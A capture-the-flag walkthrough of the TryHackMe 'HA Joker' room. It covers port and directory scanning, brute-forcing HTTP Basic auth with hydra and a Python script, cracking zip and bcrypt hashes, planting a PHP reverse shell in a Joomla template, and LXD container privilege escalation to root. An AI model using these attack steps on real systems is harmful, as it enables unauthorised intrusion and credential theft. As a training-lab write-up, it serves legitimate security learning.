[TryHackMe] HA Joker CTF: Walkthrough

Overview

A walkthrough of the TryHackMe room "HA Joker CTF".

Task 1

Q2.What version of Apache is it?

Run a full port scan with service and script detection.

$ nmap -Pn -T4 -sVC -A --min-rate 5000 -p- 10.10.111.217 -oN nmap_result
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
|   256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_  256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Joker
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open  http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Please enter the password.
|_http-title: 401 Unauthorized

The scan shows three open ports:

Port   Service   Version
22     ssh       OpenSSH 7.6p1 (Ubuntu)
80     http      Apache httpd 2.4.29 (Ubuntu), no authentication
8080   http      Apache httpd 2.4.29 (Ubuntu), HTTP Basic authentication

A.2.4.29

Q3.What port on this machine does not need to be authenticated by user and password?

Port 80 can be browsed without any authentication.

(Screenshot: index page on port 80)

A.80

Q4.There is a file on this port that seems to be secret, what is it?

Hint.Extensions file: the dirb command comes with a flag that appends each word with these extensions. Try to use dirb with a file that contains some common extensions in a web server.

Run a directory scan. The hint is about file extensions, so the ffuf run below appends .php, .html, .js and .txt to every word.

$ dirsearch -u http://10.10.111.217
[00:56:15] 301 -  312B  - /css  ->  http://10.10.111.217/css/
[00:56:31] 301 -  312B  - /img  ->  http://10.10.111.217/img/
[00:56:51] 200 -   24KB - /phpinfo.php
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://10.10.111.217/FUZZ -recursion -recursion-depth 1 -ic -c -e .php,.html,.js,.txt
index.html              [Status: 200, Size: 5954, Words: 783, Lines: 97, Duration: 240ms]
secret.txt              [Status: 200, Size: 320, Words: 62, Lines: 7, Duration: 240ms]

This turns up /phpinfo.php and /secret.txt.

A.secret.txt

Q5.There is another file which reveals information of the backend, what is it?

A.phpinfo.php

Q6.When reading the secret file, we find a conversation that seems to contain at least two users and some keywords that can be interesting, what user do you think it is?

secret.txt contains a conversation between Batman and the Joker.

secret.txt
Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"

A.joker

Q7.What port on this machine need to be authenticated by Basic Authentication Mechanism?

A.8080

Q8.At this point we have one user and a url that needs to be authenticated, brute force it to get the password, what is that password?

Hint.Maybe burp with format user:pass and encode with base64? Note: Don't forget decode it!!

Reaching port 8080 requires getting past HTTP Basic authentication.
Brute-force the password with hydra, using the user name joker taken from secret.txt.

$ hydra -f -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.83.94 http-get /
[8080][http-get] host: 10.10.83.94   login: joker   password: hannah

A.hannah
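As an added example (not from the original walkthrough, which used hydra), here is what the brute force does at the HTTP level: Basic auth is nothing more than base64(user:password) in an Authorization header, and a hit is any response that is not 401. To run offline, the script stands up its own tiny Basic-auth server on loopback; the server, its valid credential joker:hannah, the five-word wordlist and the port are assumptions made for this example, while the realm string is the one nmap reported.

```python
"""Brute-force HTTP Basic authentication against a local stand-in server.

Added example, not code from the walkthrough (which used hydra).  The
stand-in server, credential, wordlist and port are constructed here so the
script runs offline; only the Authorization header format and the 401/200
decision are the same as against the real box.
"""
import base64
import http.server
import socketserver
import threading
import urllib.error
import urllib.request
from typing import Optional

# Constructed stand-in for the port-8080 vhost: one valid user, and the realm
# string nmap showed on the real box.
REALM = "Please enter the password."
VALID_USER = "joker"
VALID_PASS = "hannah"


def basic_header(user: str, password: str) -> str:
    """RFC 7617 credential: 'Basic ' + base64(user ':' password).

    For joker:hannah this is the same value the walkthrough later passes to
    dirsearch as -H "Authorization: Basic am9rZXI6aGFubmFo".
    """
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


class _BasicAuthHandler(http.server.BaseHTTPRequestHandler):
    """Minimal server: 200 for the right credential, 401 + challenge otherwise."""

    def do_GET(self):
        if self.headers.get("Authorization") == basic_header(VALID_USER, VALID_PASS):
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html>Joomla! stand-in</html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", f'Basic realm="{REALM}"')
            self.end_headers()

    def log_message(self, *args):  # silence per-request logging
        pass


def start_stand_in_server():
    """Bind a free loopback port and serve in a daemon thread."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _BasicAuthHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def try_login(url: str, user: str, password: str) -> int:
    """Return the HTTP status code for one credential attempt."""
    req = urllib.request.Request(url, headers={"Authorization": basic_header(user, password)})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def brute_force_basic(url: str, user: str, wordlist) -> Optional[str]:
    """Same decision rule as hydra's http-get module: first non-401 is a hit."""
    for candidate in wordlist:
        if try_login(url, user, candidate) != 401:
            return candidate
    return None


def demo() -> Optional[str]:
    """Spin up the stand-in, run the attack, tear it down; returns the password."""
    srv, port = start_stand_in_server()
    try:
        # Constructed mini wordlist; on the real box this was rockyou.txt.
        wordlist = ["123456", "password", "batman", "hannah", "joker"]
        return brute_force_basic(f"http://127.0.0.1:{port}/", "joker", wordlist)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("password:", demo())
```

Against a real target the decision should stay on the status code rather than on response length, and a 200 that merely returns a login form is still not a hit. The base64 value this computes for joker:hannah is the one reused in the dirsearch Authorization header further down.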

Q9.Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like an admin directory?

Hint.Nikto with the credentials we obtained?

With joker:hannah we can now access port 8080.

(Screenshot: index page on port 8080)

The site runs the Joomla CMS.

The admin panel appears to be at /administrator/.

A./administrator/

Q10.We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?

Run a directory scan against port 8080, passing the Basic credentials in an Authorization header (am9rZXI6aGFubmFo is base64 of joker:hannah).

$ dirsearch -u http://10.10.83.94:8080/ -H "Authorization: Basic am9rZXI6aGFubmFo"
[11:29:28] 301 -  325B  - /administrator  ->  http://10.10.83.94:8080/administrator/
[11:29:29] 200 -    2KB - /administrator/
[11:29:29] 403 -  278B  - /administrator/includes/
[11:29:29] 200 -    2KB - /administrator/index.php
[11:29:29] 200 -   31B  - /administrator/cache/
[11:29:29] 200 -   31B  - /administrator/logs/
[11:29:29] 301 -  330B  - /administrator/logs  ->  http://10.10.83.94:8080/administrator/logs/
[11:29:38] 301 -  315B  - /bin  ->  http://10.10.83.94:8080/bin/
[11:29:38] 200 -   31B  - /bin/
[11:29:40] 301 -  317B  - /cache  ->  http://10.10.83.94:8080/cache/        
[11:29:40] 200 -   31B  - /cache/
[11:29:42] 200 -   31B  - /cli/
[11:29:43] 200 -   12MB - /backup
[11:29:43] 200 -   12MB - /backup.zip
[11:29:44] 301 -  322B  - /components  ->  http://10.10.83.94:8080/components/
[11:29:44] 200 -   31B  - /components/
[11:29:46] 200 -    0B  - /configuration.php
[11:30:01] 200 -    1KB - /htaccess.txt
[11:30:03] 301 -  318B  - /images  ->  http://10.10.83.94:8080/images/      
[11:30:03] 200 -   31B  - /images/
[11:30:03] 301 -  320B  - /includes  ->  http://10.10.83.94:8080/includes/  
[11:30:03] 200 -   31B  - /includes/
[11:30:04] 200 -    4KB - /index.php
[11:30:04] 404 -    9B  - /index.php/login/
[11:30:08] 301 -  320B  - /language  ->  http://10.10.83.94:8080/language/  
[11:30:08] 200 -   31B  - /layouts/
[11:30:09] 200 -   31B  - /libraries/
[11:30:09] 301 -  321B  - /libraries  ->  http://10.10.83.94:8080/libraries/
[11:30:09] 200 -    7KB - /LICENSE
[11:30:09] 200 -    7KB - /LICENSE.txt
[11:30:14] 301 -  317B  - /media  ->  http://10.10.83.94:8080/media/        
[11:30:14] 200 -   31B  - /media/
[11:30:16] 301 -  319B  - /modules  ->  http://10.10.83.94:8080/modules/    
[11:30:16] 200 -   31B  - /modules/
[11:30:27] 301 -  319B  - /plugins  ->  http://10.10.83.94:8080/plugins/    
[11:30:27] 200 -   31B  - /plugins/
[11:30:31] 200 -    2KB - /README
[11:30:31] 200 -    2KB - /README.txt
[11:30:33] 200 -  395B  - /robots.txt
[11:30:35] 403 -  278B  - /server-status
[11:30:35] 403 -  278B  - /server-status/
[11:30:44] 301 -  321B  - /templates  ->  http://10.10.83.94:8080/templates/
[11:30:45] 200 -   31B  - /templates/
[11:30:45] 200 -   31B  - /templates/index.html
[11:30:45] 200 -    0B  - /templates/beez3/
[11:30:45] 200 -    0B  - /templates/protostar/
[11:30:45] 200 -    0B  - /templates/system/
[11:30:46] 200 -   31B  - /tmp/
[11:30:46] 301 -  315B  - /tmp  ->  http://10.10.83.94:8080/tmp/
[11:30:54] 200 -  567B  - /web.config
[11:30:54] 200 -  567B  - /web.config.txt

/backup.zip was found.

A.backup.zip

Q11.We have the backup file and now we should look for some information, for example database, configuration files, etc ... But the backup file seems to be encrypted. What is the password?

Hint*.Use john to crack the zip hash

The ZIP is password-protected, so extract its hash with zip2john and crack it with john.

$ zip2john backup.zip > zip_hash

$ john zip_hash --wordlist=/usr/share/wordlists/rockyou.txt
hannah           (backup.zip)

A.hannah

Q12.Remember that... We need access to the administration of the site... Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?

Unzipping the archive with that password yields db/joomladb.sql.

The users table in the dump holds the administrator account (username admin) and its bcrypt password hash.

(Screenshot: admin row from the users table)

A.admin

Q13.Super Duper User! What is the password?

Hint.Again, john and mysql hash password.

Crack the hash. The $2y$ prefix marks it as bcrypt, which is hashcat mode 3200 (john: --format=bcrypt).

$ hashcat -a 0 -m 3200 admin_hash /usr/share/wordlists/rockyou.txt
$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG:abcd1234

A.abcd1234
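Rather than restoring joomladb.sql into MySQL (Q12) and then guessing the hash type for Q13, the users table can be read straight out of the dump. The following added example (not the walkthrough's own code) parses mysqldump output for the Joomla `<prefix>_users` table, maps each value to its column name from the CREATE TABLE, and classifies every password hash so the right hashcat mode is used. The dump excerpt, the cc1gr_ table prefix, the trimmed column list and the joker row are constructed for this example; only the admin bcrypt hash is the one quoted above.

```python
"""Read the Joomla users table out of a mysqldump file and classify the hashes.

Added example, not code from the walkthrough.  The excerpt below, the cc1gr_
prefix, the reduced column list and the joker row are constructed; the admin
hash is the one cracked on this page.
"""
import re
from typing import Optional

# Constructed excerpt in mysqldump's default layout: column names appear only
# in CREATE TABLE, and each table gets one INSERT ... VALUES (...),(...); line.
SAMPLE_DUMP = r"""
-- MySQL dump (constructed excerpt)
DROP TABLE IF EXISTS `cc1gr_users`;
CREATE TABLE `cc1gr_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(400) NOT NULL DEFAULT '',
  `username` varchar(150) NOT NULL DEFAULT '',
  `email` varchar(100) NOT NULL DEFAULT '',
  `password` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_username` (`username`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
INSERT INTO `cc1gr_users` VALUES (547,'Super User','admin','admin@localhost.local','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG'),(548,'Jack O\'Lantern','joker','joker@localhost.local','3a0f1d2c9b8e7f6a5d4c3b2a19080706:WRwZlHfvv2sT4qF9aY3rBc1uLp8mNkOe');
"""


def find_user_tables(dump_text: str) -> list:
    """Joomla names its user table <prefix>_users; the prefix is random per install."""
    return sorted(set(re.findall(r"CREATE TABLE `([A-Za-z0-9_]*_users)`", dump_text)))


def _columns_from_create(dump_text: str, table: str) -> Optional[list]:
    m = re.search(r"CREATE TABLE `%s` \((.*?)\n\)" % re.escape(table), dump_text, re.S)
    if not m:
        return None
    # Column definitions start with a backticked name; KEY / PRIMARY KEY lines do not.
    return re.findall(r"^\s*`([^`]+)`", m.group(1), re.M)


def _iter_tuples(values_part: str):
    """Yield the text inside each top-level (...) of a VALUES list, ignoring
    parentheses and commas that sit inside quoted strings."""
    depth, in_str, esc, start = 0, False, False, 0
    for i, c in enumerate(values_part):
        if in_str:
            if esc:
                esc = False
            elif c == "\\":
                esc = True
            elif c == "'":
                in_str = False
            continue
        if c == "'":
            in_str = True
        elif c == "(":
            if depth == 0:
                start = i + 1
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                yield values_part[start:i]


def _split_values(tuple_body: str) -> list:
    """Split one tuple body into values; handles '' and \\' escapes (\\x -> x), NULL."""
    vals, i, n = [], 0, len(tuple_body)
    while i < n:
        c = tuple_body[i]
        if c in " ,":
            i += 1
        elif c == "'":
            i, buf = i + 1, []
            while i < n:
                c = tuple_body[i]
                if c == "\\" and i + 1 < n:
                    buf.append(tuple_body[i + 1])
                    i += 2
                elif c == "'":
                    if i + 1 < n and tuple_body[i + 1] == "'":
                        buf.append("'")
                        i += 2
                    else:
                        i += 1
                        break
                else:
                    buf.append(c)
                    i += 1
            vals.append("".join(buf))
        else:
            j = tuple_body.find(",", i)
            j = n if j == -1 else j
            tok = tuple_body[i:j].strip()
            vals.append(None if tok.upper() == "NULL" else tok)
            i = j
    return vals


def extract_users(dump_text: str, table: Optional[str] = None) -> list:
    """Return one dict per row of the users table, keyed by column name."""
    if table is None:
        tables = find_user_tables(dump_text)
        if not tables:
            return []
        table = tables[0]
    insert_re = re.compile(r"INSERT INTO `%s` (?:\(([^)]*)\) )?VALUES (.*)$" % re.escape(table), re.M)
    rows = []
    for m in insert_re.finditer(dump_text):
        # --complete-insert dumps carry the column list inline; otherwise use CREATE TABLE.
        cols = re.findall(r"`([^`]+)`", m.group(1)) if m.group(1) else _columns_from_create(dump_text, table)
        if not cols:
            continue
        for body in _iter_tuples(m.group(2)):
            rows.append(dict(zip(cols, _split_values(body))))
    return rows


def hash_info(h: str):
    """Classify a Joomla password hash and return (algorithm, hashcat -m mode)."""
    if re.fullmatch(r"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}", h):
        return "bcrypt", 3200            # what this box stores; john --format=bcrypt
    if re.fullmatch(r"\$[PH]\$[./A-Za-z0-9]{31}", h):
        return "phpass", 400
    if re.fullmatch(r"[0-9a-f]{32}:[A-Za-z0-9]{32}", h):
        return "joomla-md5-salt", 11     # md5(password + salt):salt, old Joomla
    if re.fullmatch(r"[0-9a-f]{32}", h):
        return "md5", 0
    return "unknown", None


def hashcat_lines(dump_text: str) -> list:
    """(username, algorithm, mode, hash) per row, ready for hashcat -a 0 -m <mode>."""
    return [(r["username"],) + hash_info(r["password"]) + (r["password"],) for r in extract_users(dump_text)]


if __name__ == "__main__":
    for user, algo, mode, h in hashcat_lines(SAMPLE_DUMP):
        print(f"{user:10} {algo:16} -m {mode}  {h}")
```

Write each distinct mode's hashes to their own file before running hashcat, since one run only accepts one -m. The backslash handling is deliberately simplified (\x becomes x), which is fine for hashes and user names but would mangle \n inside long text columns.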

Q14.At this point, you should upload a reverse-shell in order to gain shell access. What is the owner of this session?

Hint.Maybe use error.php page on a template? Of course try it and execute 'id' command.

Logging into the admin panel with admin:abcd1234 works.

(Screenshot: Joomla control panel)

Follow the HackTricks notes on Joomla: an administrator can edit a template's PHP files, which gives code execution on the web server.

Open the template manager at /administrator/index.php?option=com_templates.

(Screenshot: template manager)

In the Template column select protostar and open error.php for editing.

(Screenshot: error.php in the template editor)

Replace its contents with the source of a PHP reverse shell, pointed at the attacking machine on port 1234, and save.

(Screenshot: reverse shell pasted into error.php)

Start a Netcat listener, then request /templates/protostar/error.php; the reverse shell connects back.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.217.226] 55470
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 09:12:12 up 20 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

A.www-data

Q15.This user belongs to a group that differs from your own group, What is this group?

Hint.Linux containers

The www-data user is also a member of the lxd group.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)

A.lxd

Q16.Spawn a tty shell.

Hint.python3

Upgrade to a proper TTY with python3.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Q18.Research how to escalate privileges using LXD permissions and check to see if there are any images available on the box.

Hint.If there isn't an image already on the box, you may need to upload one...

Check which LXD images are on the box.

$ lxc image list
+-------+-------------+--------+-------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+------+------+-------------+

There is no image, so fetch one from the attacking Kali machine (an Alpine image served over HTTP at 10.6.55.144) and import it under the alias myimage.

$ wget http://10.6.55.144/alpine-v3.13-x86_64-20210218_0139.tar.gz

$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage

$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Oct 13, 2024 at 4:24pm (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

Q19.The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.

Hint.lxc init ... lxc config device ... lxc start ... lxc exec ...

Escalate privileges: create a privileged container from the image, mount the host's root filesystem into it at /mnt/root, start it and get a shell inside.

$ lxc init myimage ignite -c security.privileged=true

$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

$ lxc start ignite

$ lxc exec ignite /bin/sh
~ # whoami
root

This is a root shell inside the container. Because the container runs with security.privileged=true and the host's / is mounted at /mnt/root, everything on the host, including /root, is readable and writable from here.

Q20.What is the name of the file in the /root directory?

Under /mnt/root/root (the host's /root) we find final.txt.

ls -la root
total 40
drwx------    5 root     root          4096 Oct 25  2019 .
drwxr-xr-x   22 root     root          4096 Oct 22  2019 ..
-rw-------    1 root     root            40 Oct 25  2019 .bash_history
-rw-r--r--    1 root     root          3106 Apr  9  2018 .bashrc
drwx------    2 root     root          4096 Oct 22  2019 .cache
drwxr-x---    3 root     root          4096 Oct 24  2019 .config
drwxr-xr-x    3 root     root          4096 Oct  8  2019 .local
-rw-------    1 root     root            33 Oct 24  2019 .mysql_history
-rw-r--r--    1 root     root           148 Aug 17  2015 .profile
-rw-r--r--    1 root     root          1003 Oct  8  2019 final.txt
cat root/final.txt

     ██╗ ██████╗ ██╗  ██╗███████╗██████╗ 
     ██║██╔═══██╗██║ ██╔╝██╔════╝██╔══██╗
     ██║██║   ██║█████╔╝ █████╗  ██████╔╝
██   ██║██║   ██║██╔═██╗ ██╔══╝  ██╔══██╗
╚█████╔╝╚██████╔╝██║  ██╗███████╗██║  ██║
 ╚════╝  ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
                                         
!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Aarti Singh: https://in.linkedin.com/in/aarti-singh-353698114

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+

A.final.txt
